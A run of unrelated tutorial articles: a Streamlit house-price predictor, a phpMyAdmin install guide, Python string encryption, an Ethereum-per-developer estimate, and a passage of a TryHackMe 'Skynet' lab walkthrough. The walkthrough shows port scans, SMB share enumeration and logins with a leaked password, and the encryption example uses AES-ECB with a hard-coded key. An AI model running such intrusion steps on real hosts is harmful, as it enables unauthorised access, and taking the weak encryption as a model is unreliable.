    pipelines.append(('ScaledEN', Pipeline([('Scaler', StandardScaler()), ('EN', ElasticNet())])))
    pipelines.append(('ScaledKNN', Pipeline([('Scaler', StandardScaler()), ('KNN', KNeighborsRegressor())])))
    pipelines.append(('ScaledCART', Pipeline([('Scaler', StandardScaler()), ('CART', DecisionTreeRegressor())])))
    pipelines.append(('ScaledSVR', Pipeline([('Scaler', StandardScaler()), ('SVR', SVR())])))

    x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=7)

    def modeling(models):
        # score every pipeline with 10-fold cross-validation on the training split
        for name, model in models:
            kfold = KFold(n_splits=10)
            results = cross_val_score(model, x_train, y_train, cv=kfold, scoring='r2')
            print(f'{name} = {results.mean()}')
    

    Notice how we used Pipeline to standardize the data for each model. We then created a function that uses 10-fold cross-validation to repeatedly train and evaluate our models. The result is then displayed using the R Squared metric.

    modeling(pipelines)
    ScaledLR = 0.6321641933826154
    ScaledLASSO = 0.6321647820595134
    ScaledEN = 0.4953062096224026
    ScaledKNN = 0.7106787517028879
    ScaledCART = 0.6207570733565403
    ScaledSVR = -0.05047991785208246
    

    The results show that KNN achieved the highest score of the six models. Let’s see if we can improve the result by tuning KNN’s parameters.

    Tuning the Parameters

    The default number of neighbors for KNN is 5, and with it KNN achieved good results. We will conduct a grid search to identify which value yields an even better score.

    from sklearn.model_selection import GridSearchCV

    scaler = StandardScaler().fit(x_train)
    rescaledx = scaler.transform(x_train)
    k = list(range(1, 31))
    param_grid = dict(n_neighbors=k)  # candidate values for n_neighbors
    model = KNeighborsRegressor()
    kfold = KFold(n_splits=10)
    grid = GridSearchCV(model, param_grid=param_grid, cv=kfold, scoring='r2')
    grid_result = grid.fit(rescaledx, y_train)
    print(f'Best: {grid_result.best_score_} using {grid_result.best_params_}')
    # Best: 0.7242988300529242 using {'n_neighbors': 14}

    The best value for k is 14, with a mean score of 0.7243, a slight improvement over the previous score.

    Can we better this score? Yes, of course. I’m aiming for an R² score of 0.80 or higher. In that case, we will try using ensemble methods.

    Ensemble Methods

    Let’s see what we can achieve using 4 different ensemble machine learning algorithms. Everything other than the models remains the same.

    from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor, GradientBoostingRegressor, AdaBoostRegressor

    # ensembles
    ensembles = []
    ensembles.append(('ScaledAB', Pipeline([('Scaler', StandardScaler()), ('AB', AdaBoostRegressor())])))
    ensembles.append(('ScaledGBM', Pipeline([('Scaler', StandardScaler()), ('GBM', GradientBoostingRegressor())])))
    ensembles.append(('ScaledRF', Pipeline([('Scaler', StandardScaler()), ('RF', RandomForestRegressor())])))
    ensembles.append(('ScaledET', Pipeline([('Scaler', StandardScaler()), ('ET', ExtraTreesRegressor())])))

    for name, model in ensembles:
        cv_results = cross_val_score(model, x_train, y_train, cv=kfold, scoring='r2')
        print(f'{name} = {cv_results.mean()}')
    

    Output:

    ScaledAB = 0.3835320642243155
    ScaledGBM = 0.772428054038791
    ScaledRF = 0.81023174859107
    ScaledET = 0.7978581384771901

    Random Forest Regressor achieved the highest score, about 0.81, which clears the 0.80 we were aiming for. Therefore, we are selecting the Random Forest Regressor algorithm to train and predict the price of a building. But can it do better than this? Sure, given that we trained only with the default parameters.

    Here is the full code. Save it as model.py.

    import pickle

    import pandas as pd
    from sklearn.preprocessing import LabelEncoder, StandardScaler
    from sklearn.ensemble import RandomForestRegressor
    from sklearn.model_selection import train_test_split, KFold, cross_val_score

    data = pd.read_csv('housing.csv')
    # select only 1000 rows
    data = data[:1000]

    # converting categorical column to int datatype
    label_encoder = LabelEncoder()
    obj = (data.dtypes == 'object')
    for col in list(obj[obj].index):
        data[col] = label_encoder.fit_transform(data[col])

    # filling in missing values
    for col in data.columns:
        data[col] = data[col].fillna(data[col].mean())

    # making data a numpy array like
    x = data.drop(['median_house_value'], axis=1)
    y = data.median_house_value
    x = x.values
    y = y.values

    # dividing data into train and test
    x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=7)

    # standardizing the data
    stds = StandardScaler()
    scaler = stds.fit(x_train)
    rescaledx = scaler.transform(x_train)

    # selecting and fitting the model for training
    model = RandomForestRegressor()
    model.fit(rescaledx, y_train)

    # saving the trained model
    with open('rf_model.pkl', 'wb') as f:
        pickle.dump(model, f)

    # saving the fitted StandardScaler
    with open('scaler.pkl', 'wb') as f:
        pickle.dump(stds, f)
    

    We selected only 1000 rows to reduce pickled size.

    Notice that we saved the fitted StandardScaler object so it can be reused in the Streamlit dashboard. Since the model was trained on scaled data, the input details from our users must be scaled in the same way before prediction.
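
To make the reason for saving the scaler concrete, here is a minimal standard-library sketch. The helpers `fit_scaler` and `transform` are hypothetical stand-ins for StandardScaler on a single feature, and the income values are invented. The point is only that the mean and standard deviation learned from the training data are what get pickled, and the same values are later applied to a user's input.

```python
import pickle
import statistics


def fit_scaler(values):
    """Learn the mean and population standard deviation from training values."""
    return {"mean": statistics.fmean(values), "scale": statistics.pstdev(values)}


def transform(params, values):
    """Standardize values with previously learned parameters."""
    return [(v - params["mean"]) / params["scale"] for v in values]


# "Training" side: learn the parameters and serialize them
train_income = [2.0, 4.0, 6.0, 8.0]
params = fit_scaler(train_income)
blob = pickle.dumps(params)

# "App" side: restore the parameters and scale a new user input with them
restored = pickle.loads(blob)
user_scaled = transform(restored, [5.0])

print(restored, user_scaled)
```

If the app fitted a fresh scaler on the single user input instead, the input would be scaled against itself and the model would receive values unlike anything it saw in training.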

    Streamlit Dashboard

    It’s now time to design our Streamlit app. Once again, we will try to keep things simple and avoid complex designs. Save the following code as app.py.

    import pickle

    import pandas as pd
    import streamlit as st


    def main():
        style = """<div style='background-color:pink; padding:12px'>
                  <h1 style='color:black'>House Price Prediction App</h1>
           </div>"""
        st.markdown(style, unsafe_allow_html=True)
        left, right = st.columns((2, 2))
        longitude = left.number_input('Enter the Longitude in negative number',
                                      step=1.0, format='%.2f', value=-21.34)
        latitude = right.number_input('Enter the Latitude in positive number',
                                      step=1.0, format='%.2f', value=35.84)
        housing_median_age = left.number_input('Enter the median age of the building',
                                               step=1.0, format='%.1f', value=25.0)
        total_rooms = right.number_input('How many rooms are there in the house?',
                                         step=1.0, format='%.1f', value=56.0)
        total_bedrooms = left.number_input('How many bedrooms are there in the house?',
                                           step=1.0, format='%.1f', value=15.0)
        population = right.number_input('Population of people within a block',
                                        step=1.0, format='%.1f', value=250.0)
        households = left.number_input('Number of households within a block',
                                       step=1.0, format='%.1f', value=43.0)
        median_income = right.number_input('Median income of a household in Dollars',
                                           step=1.0, format='%.1f', value=3000.0)
        ocean_proximity = st.selectbox('How close to the sea is the house?',
                                       ('<1H OCEAN', 'INLAND', 'NEAR OCEAN', 'NEAR BAY', 'ISLAND'))
        button = st.button('Predict')

        # if button is pressed
        if button:
            # make prediction
            result = predict(longitude, latitude, housing_median_age, total_rooms,
                             total_bedrooms, population, households, median_income,
                             ocean_proximity)
            st.success(f'The value of the house is ${result}')
    

    We imported Streamlit and other libraries. Then we defined our main function. We want it to be executed as soon as we open the app, so we will call it under the __name__ check at the very end of our script.

    The unsafe_allow_html=True argument tells Streamlit to render the HTML tags in the string instead of escaping them as plain text.

    With st.columns, we were able to display our variables side by side. We formatted each variable to be the same datatype in our dataset. If the button is pressed, then a callback function, the predict() function, is executed.

    👉 Recommended: Streamlit Button — A Helpful Guide

    Let’s now define the predict() function.

    # load the trained model
    with open('rf_model.pkl', 'rb') as rf:
        model = pickle.load(rf)

    # load the StandardScaler
    with open('scaler.pkl', 'rb') as stds:
        scaler = pickle.load(stds)


    def predict(longitude, latitude, housing_median_age, total_rooms, total_bedrooms,
                population, households, median_income, ocean_pro):
        # processing user input: same integer codes that LabelEncoder assigned
        ocean = (0 if ocean_pro == '<1H OCEAN' else
                 1 if ocean_pro == 'INLAND' else
                 2 if ocean_pro == 'ISLAND' else
                 3 if ocean_pro == 'NEAR BAY' else 4)
        med_income = median_income / 5
        lists = [longitude, latitude, housing_median_age, total_rooms, total_bedrooms,
                 population, households, med_income, ocean]
        df = pd.DataFrame(lists).transpose()
        # scaling the data; transform() returns a new array, so keep the result
        scaled = scaler.transform(df)
        # making predictions using the trained model
        prediction = model.predict(scaled)
        # predict() returns an array with one value per input row
        result = int(prediction[0])
        return result


    # run the app; this goes at the very end of app.py
    if __name__ == '__main__':
        main()
    

    We started by loading the trained model and the StandardScaler we saved earlier.

    In the predict() function, we use a chained ternary operator to turn the user's ocean proximity choice into a number.

    Notice that we made sure it corresponds with the number assigned by LabelEncoder. If you are ever in doubt, use the .value_counts() method on the categorical column to confirm.
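
As a quick way to check that correspondence, the sketch below reproduces the numbering with plain Python. It relies on the assumption that LabelEncoder numbers the unique labels in sorted order and that all five categories appear in the training rows; the `categories` list and the `mapping` name are only for illustration.

```python
# The five ocean_proximity labels offered in the selectbox, in arbitrary order
categories = ['NEAR BAY', '<1H OCEAN', 'INLAND', 'NEAR OCEAN', 'ISLAND']

# Number the unique labels in sorted order, as LabelEncoder is assumed to do
mapping = {label: code for code, label in enumerate(sorted(set(categories)))}

for label, code in mapping.items():
    print(code, label)
```

The resulting codes match the ternary chain in predict(). If a category were missing from the 1000 training rows, the codes after it would shift down by one, so it is worth checking the fitted encoder on your own data.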

    We divided the median_income by 5 since the corresponding column in our dataset is said to be in tens of thousands of dollars. Keep in mind that StandardScaler does not make this step optional: the scaler was fitted on the training column, so the user's input has to be on the same scale as that column before it is transformed.

    We put the inputs in a list, turn the list into a DataFrame, and transpose it so that it becomes a single row with one column per feature. We also made sure the order of the parameters in the predict() function matches the column order of the training data.

    If the function seems to predict the same amount despite changes to the input details, then you may check the correlation the target variable has over the features by typing data.corr().

    If we were to apply Recursive Feature Elimination (RFE) to select the best features capable of predicting the target variable, it would select just 4: longitude, latitude, median_income, and ocean_proximity. Let me show you what I mean.

    from sklearn.feature_selection import RFE

    model = RandomForestRegressor()
    rfe = RFE(model)
    fit = rfe.fit(x, y)
    print(fit.n_features_)
    # 4
    print(fit.support_)
    # array([ True, True, False, False, False, False, False, True, True])
    print(fit.ranking_)
    # array([1, 1, 2, 6, 3, 5, 4, 1, 1])
    

    RFE kept only 4 of the 9 features (by default it keeps half of them), and these are the ones the model relies on most. If you kept getting the same amount while changing the other inputs, that may be the reason.

    The purpose of this tutorial is purely educational, to demonstrate how to use Python to solve machine learning problems. I tried to keep things simple by not going through data visualization and feature engineering. Since the data is old, it should not be relied on when making important decisions.

    We finally came to the end of the tutorial. Be sure to check my GitHub page to see the full project code.

    To deploy on Streamlit Cloud, I assume you have already created a repository and added the required files. Then, you create an account on Streamlit Cloud, and input your repository URL. Streamlit will do the rest.

    I have already deployed mine on Streamlit Cloud. Alright, enjoy your day.

    👉 Recommended Project: How I Built and Deployed a Python Loan Eligibility Prediction App on Streamlit


    How to Install phpMyAdmin on Windows?

    by Vincy. Last modified on February 2nd, 2023.

    Installing phpMyAdmin on a Windows computer will vary based on the existing environment. This article will tell the step-by-step process of installing phpMyAdmin using the following methods.

    1. Manual installation on top of the existing Apache server.
    2. Installation via WAMP package.

    Method 2 is the easier one, because phpMyAdmin is installed automatically as part of the WAMP package. Other bundles, such as XAMPP (or LAMP on Linux), reduce the effort in the same way.

    In a previous tutorial, we have seen how to install XAMPP. It helped to set up an Apache, PHP, and MySQL database server environment on a server.


    Manual installation on top of the existing Apache server

    We have seen the advantages of phpMyAdmin managing databases through a web interface.

    Prerequisites

    Make sure that you have installed the following before you start installing phpMyAdmin.

    • Apache server
    • MySQL server
    • PHP

    Then, follow the below steps.

    • Step 1: Download the phpMyAdmin zip file from its official website by clicking the download that matches your needs.
    • Step 2: Unzip the downloaded file and copy the extracted phpMyAdmin folder.
    • Step 3: Move the extracted phpMyAdmin folder to the Apache web root, the htdocs directory.
    • Step 4: Open the php.ini file found in the PHP config root. Make sure that you have administrator permission to edit the file.
    • Step 5: Uncomment the following extensions to enable them.
      • php_mbstring.dll
      • php_mysqli.dll
    • Step 6: Restart the Apache and MySQL servers.
    • Step 7: Run the phpMyAdmin application the same way you run other PHP applications in the Apache web root.
      • An example web address is http://localhost/phpmyadmin/. It will show the phpMyAdmin home page listing all the databases.
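
Step 5 can also be scripted. The sketch below is only an illustration under two assumptions: that the lines in your php.ini look like `;extension=php_mbstring.dll` (a leading semicolon marks a comment in php.ini), and that you apply the function to the file's text yourself. The function name `enable_extensions` and the sample text are hypothetical.

```python
def enable_extensions(ini_text, extensions):
    """Uncomment 'extension=<name>' lines for the given extension names."""
    wanted = {f"extension={name}" for name in extensions}
    result = []
    for line in ini_text.splitlines():
        stripped = line.lstrip()
        if stripped.startswith(";"):
            # Drop the leading semicolon(s) and see if this is a line we want
            candidate = stripped.lstrip(";").strip()
            if candidate in wanted:
                line = candidate
        result.append(line)
    return "\n".join(result)


sample = (
    ";extension=php_mbstring.dll\n"
    ";extension=php_mysqli.dll\n"
    ";extension=php_gd2.dll"
)
updated = enable_extensions(sample, ["php_mbstring.dll", "php_mysqli.dll"])
print(updated)
```

Only the two requested lines lose their semicolon; every other line is left untouched. Keep a backup of php.ini before writing any change back to disk.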

    Installation via WAMP package

    We have seen a seven-step process of installing phpMyAdmin manually. Now, let’s see how the WAMP package provides an easy way of achieving this.

    • Step 1: Choose the suitable WAMP installer and click “download directly” -> “Download Latest Version”
    • Step 2: Double-click the downloaded WAMP installer and proceed with the wizards asking the following.
      • Choose language.
      • Accept the agreement.
      • Accept or configure the default browser.
      • Accept or Configure the default editor.
    • Step 3: Click “Finish” when the wizard prompts.
    • Step 4: Open the WAMP tool and choose phpMyAdmin from the menu.

    With this method, phpMyAdmin is installed as part of the package and needs no separate setup.

    Conclusion

    Once installed, phpMyAdmin helps you manage databases easily through a web application interface. Previously, we saw how to use some of its most frequently used tools, for example, how to create a database using phpMyAdmin.

    This application helps connect a local or remote database by logging in via the landing login panel.


    Two Easy Ways to Encrypt and Decrypt Python Strings


    Today I gave a service consultant access to one of my AWS servers. I have a few files on the server that I was reluctant to share with the service consultant because these files contain sensitive personal data. Python is my default way to solve these types of problems. Naturally, I wondered how to encrypt this data using Python — and decrypt it again after the consultant is done? In this article, I’ll share my learnings! 👇

    🔐 Question: Given a Python string. How to encrypt the Python string using a password or otherwise and decrypt the encrypted phrase to obtain the initial cleartext again?

    There are several ways to encrypt and decrypt Python strings. I decided to share only the top two ways (my personal preference is Method 1):

    Method 1: Cryptography Library Fernet

    To encrypt and decrypt a Python string, install and import the cryptography library, generate a Fernet key, and create a Fernet object with it. You can then encrypt the string using the Fernet.encrypt() method and decrypt the encrypted string using the Fernet.decrypt() method.

    If you haven’t already, you must first install the cryptography library using the pip install cryptography shell command or variants thereof. 👉 See more here.

    Here’s a minimal example where I’ve highlighted the encryption and decryption calls:

    # Import the cryptography library
    from cryptography.fernet import Fernet

    # Generate a Fernet key
    key = Fernet.generate_key()

    # Create a Fernet object with that key
    f = Fernet(key)

    # Input string to be encrypted
    input_string = "Hello World!"

    # Encrypt the string
    encrypted_string = f.encrypt(input_string.encode())

    # Decrypt the encrypted string
    decrypted_string = f.decrypt(encrypted_string)

    # Print the original and decrypted strings
    print("Original String:", input_string)
    print("Decrypted String:", decrypted_string.decode())

    This small script first imports the Fernet class from the cryptography library that provides high-level cryptographic primitives and algorithms such as

    • symmetric encryption,
    • public-key encryption,
    • hashing, and
    • digital signatures.

    A Fernet key is then generated and used to create a Fernet object. The input string to be encrypted is then provided as an argument to the encrypt() method of the Fernet object. This method encrypts the string using the Fernet key and returns an encrypted string.

    The encrypted string is then provided as an argument to the decrypt() method of the Fernet object. This method decrypts the encrypted string using the Fernet key and returns a decrypted string.

    Finally, the original string and the decrypted string are printed to the console.

    The output is as follows:

    Original String: Hello World!
    Decrypted String: Hello World!
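
The question above also mentions encrypting with a password, while the example uses a randomly generated key. One possible way to bridge the two, sketched here with the standard library only, is to derive the key from the password. A Fernet key is 32 bytes encoded as URL-safe base64, so the output of this hypothetical `key_from_password` helper has the shape that `Fernet(key)` expects. The iteration count and salt size are assumptions chosen for illustration.

```python
import base64
import hashlib
import os


def key_from_password(password, salt, iterations=200_000):
    """Derive a 32-byte key with PBKDF2-HMAC-SHA256 and encode it like a Fernet key."""
    raw = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen=32)
    return base64.urlsafe_b64encode(raw)


# The salt is random but not secret; store it next to the encrypted data
salt = os.urandom(16)
key = key_from_password("my secret password", salt)

# The same password and salt always give the same key
same_key = key_from_password("my secret password", salt)
print(len(key), key == same_key)
```

To decrypt later, you would need the same password and the stored salt to rebuild the key.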


    Method 2: PyCrypto Cipher

    Install and import the PyCrypto library to encrypt and decrypt a string. As preparation, pad the input string to 32 characters using string.rjust(32), because AES works on 16-byte blocks and the input length must be a multiple of 16. Then, define a secret key, i.e., a “password”, which must be 16, 24, or 32 bytes long. Finally, encrypt the string using the AES algorithm, which is a type of symmetric-key encryption.

    You can then decrypt the encrypted string again by using the same key.

    Here’s a small example:

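    # Import AES from the PyCrypto library
    # (the maintained PyCryptodome fork provides the same Crypto package)
    from Crypto.Cipher import AES

    # Input string to be encrypted (padding to adjust length)
    input_string = "Hello World!".rjust(32)

    # Secret key (pw), 16 bytes long
    key = b'1234567890123456'

    # Encrypt the string
    # (ECB was PyCrypto's implicit default mode; PyCryptodome needs it spelled out)
    cipher = AES.new(key, AES.MODE_ECB)
    encrypted_string = cipher.encrypt(input_string.encode())

    # Decrypt the encrypted string with a fresh cipher object built from the same key
    decipher = AES.new(key, AES.MODE_ECB)
    decrypted_string = decipher.decrypt(encrypted_string)

    # Print the original and decrypted strings
    print("Original String:", input_string)
    print("Decrypted String:", decrypted_string.decode())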

    This code imports the PyCrypto library and uses it to encrypt and decrypt a string.

    The input string is "Hello World!", which is padded to 32 characters to make sure it is the correct length.

    Then, a secret key (password) is defined.

    The string is encrypted using the AES algorithm, which is a type of symmetric-key encryption.

    The encrypted string is then decrypted using the same key and the original and decrypted strings are printed. Here’s the output:

    Original String: Hello World!
    Decrypted String: Hello World!
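
The example pads with spaces via rjust(32), which changes the string and only works for inputs of up to 32 characters. A common alternative, named plainly here as a swapped-in technique and not the method used above, is PKCS#7 padding, which works for any length and can be removed exactly after decryption. This is a minimal standard-library sketch; `pad` and `unpad` are illustrative helper names.

```python
BLOCK_SIZE = 16  # AES block size in bytes


def pad(data: bytes) -> bytes:
    """Append n bytes of value n so the length becomes a multiple of 16."""
    n = BLOCK_SIZE - len(data) % BLOCK_SIZE
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    """Remove PKCS#7 padding, checking that it is well formed."""
    n = data[-1]
    if not 1 <= n <= BLOCK_SIZE or data[-n:] != bytes([n]) * n:
        raise ValueError("invalid padding")
    return data[:-n]


padded = pad(b"Hello World!")
restored = unpad(padded)
print(len(padded), restored)
```

With this approach you would encrypt `pad(input_string.encode())` and call `unpad()` on the decrypted bytes.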



    $821,000 Ethereum Value per Solidity Developer


    Ethereum’s Total Value Locked (TVL) is $28,000,000,000 USD and Ethereum’s market cap is $193,000,000,000 USD. Based on my estimations below, there are at most 269,000 monthly active Solidity developers.

    Therefore, the Ethereum TVL per Solidity developer is more than $104,000, and the Ethereum market cap per Solidity developer is more than $717,000. So for all practical purposes, you can assume that the combined Ethereum value (TVL plus market cap) per Solidity developer is at least $821,000.*

    *I used very conservative assumptions; the real numbers will be much higher (see below). Also, I’m aware that not all Ethereum developers use Solidity, but most (see below). At the time of writing, we’re amid a bear market in 2023, with the TVL of both Ethereum and its Solidity smart contracts down roughly 70%. As the number of developers doesn’t grow proportionally to the price in a bull market, this number can be seen as a historic “worst-case” estimation.

    How Many Monthly Active Solidity Developers Are There?

    My basic assumption is that a monthly active Solidity developer checks the Solidity docs at least once per month. Currently, the Solidity docs have 580,000 visits per month and 2.15 pages per visit, so our estimate is 580,000 / 2.15 ≈ 269,000 active Solidity developers per month.
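
The arithmetic behind these figures is easy to reproduce. The short sketch below uses only the numbers quoted in this article; the variable names are mine.

```python
visits_per_month = 580_000
pages_per_visit = 2.15
tvl_usd = 28_000_000_000
market_cap_usd = 193_000_000_000

# Developer estimate: visits divided by pages per visit
developers_raw = visits_per_month / pages_per_visit
developers = 269_000  # the rounded figure used in the article

tvl_per_dev = tvl_usd / developers
cap_per_dev = market_cap_usd / developers
combined_per_dev = tvl_per_dev + cap_per_dev

print(round(developers_raw))
print(round(tvl_per_dev), round(cap_per_dev), round(combined_per_dev))
```

The raw estimate is just under 270,000 developers, and the per-developer values round down to the $104,000, $717,000, and $821,000 quoted above.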

    Reasons there are more Solidity developers: Some active Solidity developers may not check out the docs during development. However, I think this won’t change the number by more than a factor of 2-3x.

    Reasons there are fewer Solidity developers: On the other hand, this may be a significant overestimation of the number of Solidity devs because the number of sessions may be much larger than the number of active users. Many Solidity developers will check out the docs multiple times per month!

    So, the figure of 269,000 Solidity developers per month is likely to be a significant overestimation and can be seen as an upper bound. Consequently, the value per Solidity developer will be much larger than our $821,000 number, even considering that not all ETH dApp developers use Solidity (only most).


    [TryHackMe] Skynet Walkthrough Using Remote File Inclusion


    🔐 How I used a remote file inclusion vulnerability to hack and root the Terminator’s computer


    CHALLENGE OVERVIEW

    • Link: https://tryhackme.com/room/skynet
    • Difficulty: Easy
    • Target: user/root flags
    • Highlight: exploiting a remote file inclusion vulnerability to spawn a reverse shell
    • Tools used: smbclient, smbmap, gobuster, metasploit
    • Tags: gobuster, smb, rfi, squirrelmail

    BACKGROUND

    In this walkthrough, we will root a terminator-themed capture-the-flag (CTF) challenge box.

    IPs

    export targetIP=10.10.144.117
    export myIP=10.6.2.23

    ENUMERATION

    sudo nmap -p- -T5 -A -oN nmapscan.txt 10.10.144.117 -Pn

    NMAP SCAN RESULTS

    Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:33 EST
    Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
    SYN Stealth Scan Timing: About 0.10% done
    Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
    SYN Stealth Scan Timing: About 2.13% done; ETC: 18:35 (0:02:18 remaining)
    Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
    SYN Stealth Scan Timing: About 2.35% done; ETC: 18:36 (0:02:46 remaining)
    Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
    SYN Stealth Scan Timing: About 2.56% done; ETC: 18:36 (0:03:10 remaining)
    Nmap scan report for 10.10.144.117
    Host is up (0.084s latency).
    Not shown: 65529 closed tcp ports (reset)
    PORT	STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    | 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
    | 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
    |_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
    80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Skynet
    110/tcp open pop3 Dovecot pop3d
    |_pop3-capabilities: RESP-CODES CAPA PIPELINING UIDL TOP SASL AUTH-RESP-CODE
    139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    143/tcp open imap Dovecot imapd
    |_imap-capabilities: IMAP4rev1 ID LOGIN-REFERRALS have LOGINDISABLEDA0001 capabilities more post-login ENABLE listed LITERAL+ Pre-login OK IDLE SASL-IR
    445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
    Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 4 hops
    Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Host script results:
    |_clock-skew: mean: 6h59m59s, deviation: 3h27m51s, median: 4h59m59s
    | smb2-security-mode:
    | 3.1.1:
    |_	Message signing enabled but not required
    |_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | smb2-time:
    | date: 2023-01-24T04:40:37
    |_ start_date: N/A
    | smb-security-mode:
    | account_used: guest
    | authentication_level: user
    | challenge_response: supported
    |_ message_signing: disabled (dangerous, but default)
    | smb-os-discovery:
    | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
    | Computer name: skynet
    | NetBIOS computer name: SKYNET\x00
    | Domain name: \x00
    | FQDN: skynet
    |_ System time: 2023-01-23T22:40:36-06:00

    TRACEROUTE (using port 554/tcp)
    HOP RTT ADDRESS
    1 13.67 ms 10.6.0.1
    2 ... 3
    4 81.31 ms 10.10.144.117

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 443.46 seconds
    

    DIRB SCAN RESULTS

    The SquirrelMail directory looks interesting. We’ll check that out in a minute.

    ENUMERATE THE SMB SHARE WITH NMAP SCAN

    nmap --script smb-enum-shares -p 139 10.10.144.117

    Output:

    Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:56 EST
    Nmap scan report for 10.10.144.117
    Host is up (0.086s latency).

    PORT	STATE SERVICE
    139/tcp open netbios-ssn

    Host script results:
    | smb-enum-shares:
    | account_used: guest
    | \\10.10.144.117\IPC$:
    | Type: STYPE_IPC_HIDDEN
    | Comment: IPC Service (skynet server (Samba, Ubuntu))
    | Users: 1
    | Max Users: <unlimited>
    | Path: C:\tmp
    | Anonymous access: READ/WRITE
    | Current user access: READ/WRITE
    | \\10.10.144.117\anonymous:
    | Type: STYPE_DISKTREE
    | Comment: Skynet Anonymous Share
    | Users: 0
    | Max Users: <unlimited>
    | Path: C:\srv\samba
    | Anonymous access: READ/WRITE
    | Current user access: READ/WRITE
    | \\10.10.144.117\milesdyson:
    | Type: STYPE_DISKTREE
    | Comment: Miles Dyson Personal Share
    | Users: 0
    | Max Users: <unlimited>
    | Path: C:\home\milesdyson\share
    | Anonymous access: <none>
    | Current user access: <none>
    | \\10.10.144.117\print$:
    | Type: STYPE_DISKTREE
    | Comment: Printer Drivers
    | Users: 0
    | Max Users: <unlimited>
    | Path: C:\var\lib\samba\printers
    | Anonymous access: <none>
    |_	Current user access: <none>

    smbmap -H 10.10.144.117
    [+] Guest session   IP: 10.10.144.117:445   Name: 10.10.144.117
        Disk          Permissions   Comment
        ----          -----------   -------
        print$        NO ACCESS     Printer Drivers
        anonymous     READ ONLY     Skynet Anonymous Share
        milesdyson    NO ACCESS     Miles Dyson Personal Share
        IPC$          NO ACCESS     IPC Service (skynet server (Samba, Ubuntu))
    

    LOGIN TO SAMBA SHARES AS ANONYMOUS

    smbclient //10.10.144.117/anonymous
    Password for [WORKGROUP\kalisurfer]:
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                D      0  Thu Nov 26 11:04:00 2020
      ..               D      0  Tue Sep 17 03:20:17 2019
      attention.txt    N    163  Tue Sep 17 23:04:59 2019
      logs             D      0  Wed Sep 18 00:42:16 2019

    Findings: grab log1.txt (a password list) and note milesdyson (a username).
    

    WALK THE WEBSITE

    We discovered a login portal for squirrelmail from the dirb scan. Let’s check it out now in our browser.

    http://10.10.144.117/squirrelmail

    Loading the site reveals a version number. A quick search points to a local file inclusion vulnerability.

    SquirrelMail version 1.4.23 [SVN]
    Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
    

    LOG IN TO SQUIRRELMAIL AS milesdyson

    The first password on the list in log1.txt, the file we took from the smb share, works! We are in milesdyson’s email account now and see two interesting emails.

    serenakogan@skynet
    01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
    01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
    00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
    00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
    00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
    00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
    00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
    00100000 01110100 01101111

    skynet@skynet
    new smb password: )s{A&2Z=F^n_E.B`
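
The first email is plain ASCII written out as 8-bit binary, so it can be decoded in a couple of lines. This small sketch decodes the opening bytes of the message; `decode_binary` is just an illustrative helper name.

```python
def decode_binary(message: str) -> str:
    """Turn space-separated 8-bit binary groups into text."""
    return "".join(chr(int(byte, 2)) for byte in message.split())


# The first two lines of the email body
sample = (
    "01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110 "
    "01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111"
)
decoded = decode_binary(sample)
print(decoded)
```

The rest of the message repeats the same few words, so it holds no credentials. The second email, with the new smb password, is the useful one.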
    

    LOGIN TO SMB SHARE AS milesdyson

    smbclient //$targetIP/milesdyson -U milesdyson
    Password for [WORKGROUP\milesdyson]:
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                                           D         0  Tue Sep 17 05:05:47 2019
      ..                                                          D         0  Tue Sep 17 23:51:03 2019
      Improving Deep Neural Networks.pdf                          N   5743095  Tue Sep 17 05:05:14 2019
      Natural Language Processing-Building Sequence Models.pdf    N  12927230  Tue Sep 17 05:05:14 2019
